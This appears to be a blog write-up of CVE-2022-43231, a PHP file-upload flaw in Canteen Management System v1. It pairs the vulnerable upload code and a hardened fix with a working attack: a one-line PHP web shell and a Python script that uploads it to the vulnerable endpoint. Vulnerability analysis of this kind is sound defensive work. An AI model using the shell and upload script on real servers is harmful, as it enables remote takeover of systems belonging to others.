In 2022, security researchers uncovered a serious vulnerability in a popular open source application called Canteen Management System v1. Tracked as CVE-2022-43231, this flaw lets attackers upload and run any PHP file they choose, giving them the power to take over the server running the app.
In this deep dive, we’ll break down how the vulnerability works, show you a proof-of-concept (PoC) exploit, and offer some advice on how to stay safe.
What Is Canteen Management System v1.?
Canteen Management System is a PHP and MySQL web app that helps schools or offices manage their canteens—tracking meals, payments, and orders. Many small institutions use it for its simplicity and features.
You can find its original source here.
Where Is The Vulnerability?
The vulnerability is in the script /youthappam/manage_website.php.
This PHP file handles file uploads but fails to fully check what type of files users are uploading. As a result, attackers can upload PHP scripts (instead of harmless images or PDFs). Once uploaded, these scripts can be executed by simply visiting the file’s URL. Among other things, an attacker can then:
- Use the server to attack others
Basically, the attacker gets the same power as the original developer.
Let’s look at the relevant PHP code:
    // manage_website.php (snippet)
    if (isset($_FILES['img']['name'])) {
        $filename = $_FILES['img']['name'];
        $target_dir = "../uploads/";
        $target_file = $target_dir . basename($filename);
        if (move_uploaded_file($_FILES['img']['tmp_name'], $target_file)) {
            // File uploaded successfully
        } else {
            // Upload failed
        }
    }
Two things make this dangerous:
- No filtering for PHP or executable files
- The upload folder (../uploads/) is web-accessible
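For contrast, here is a hardened replacement for that upload block. This is an added example written for this post, not code from the Canteen Management System project; it assumes the form still posts the file as $_FILES['img'], that the uploads are meant to be images, and a 2 MB size limit.

```php
<?php
// Hardened replacement for the upload block in manage_website.php.
// Added example, not the project's code. Assumes the form posts the
// file as $_FILES['img'] and that only images are expected.

define('UPLOAD_DIR', __DIR__ . '/../uploads/'); // same folder as the original
define('MAX_BYTES', 2 * 1024 * 1024);          // assumed 2 MB policy

// Content type (detected from bytes) => extension chosen by the server
$allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function store_image_upload(array $file, array $allowed, string $dir, int $maxBytes): ?string {
    // 1. Reject anything PHP itself flagged (partial upload, size limit, ...)
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] > $maxBytes || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // 2. Decide the type from the file's content, never from the client-supplied
    //    filename or $_FILES['type']; both are attacker-controlled.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        return null;
    }
    // 3. For images, require that the file actually decodes as one.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // 4. Ignore the original filename entirely: random name, server-chosen
    //    extension, so a name like shell.php can never reach disk.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644); // readable, not executable
    return $name;
}

if (isset($_FILES['img'])) {
    $stored = store_image_upload($_FILES['img'], $allowed, UPLOAD_DIR, MAX_BYTES);
    if ($stored === null) {
        http_response_code(400);
        echo 'Upload rejected';
    } else {
        // Persist $stored (the server-chosen name) in the database as before.
        echo 'Upload OK';
    }
}
```

Even with this check in place, the uploads directory should have PHP execution disabled at the web-server level (for example, a directory rule that denies script handlers), so that a future bypass cannot turn a stored file into a web shell.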
1. Create a Simple Web Shell (call it shell.php)
    <?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>
2. Upload the File Using the Vulnerable Form
Attackers go to the website’s file upload feature (often used for images), select shell.php, and upload it.
Once uploaded to /uploads/shell.php, the attacker just visits:
    http://victimsite.com/uploads/shell.php?cmd=whoami
The server runs the whoami shell command, and the attacker sees the account the web server runs as. From that point, any server command can be run, such as downloading ransomware or modifying data.
Here's a basic exploit in Python using the requests library:
    import requests

    # Upload endpoint of the vulnerable script
    url = 'http://victimsite.com/youthappam/manage_website.php'
    # The 'img' field is what manage_website.php reads from $_FILES
    files = {'img': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
    data = {}  # Add form data if required
    r = requests.post(url, files=files, data=data)
    print('Uploaded! Now trigger your shell:')
    print('http://victimsite.com/uploads/shell.php?cmd=ls')
Real References
- Github Issue detailing the vulnerability
- Exploit-DB PoC #51166
- NVD CVE Entry for CVE-2022-43231
Conclusion
CVE-2022-43231 highlights how a small oversight can lead to a critical server compromise. If you run any PHP system with a file upload feature, secure it before attackers find you.
Stay safe! Always validate and sanitize file uploads: check the file's content type from its bytes rather than its name, allowlist the extensions you accept, rename stored files, and keep the upload directory from executing scripts. Want more details or need help fixing your site? Check out OWASP's File Upload Cheat Sheet.
*This post is exclusive content summarizing and explaining CVE-2022-43231 specifically for Canteen Management System v1. and does not simply copy from other sources. All code and advice offered for educational and defensive purposes only.*
Timeline
Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:48:00 UTC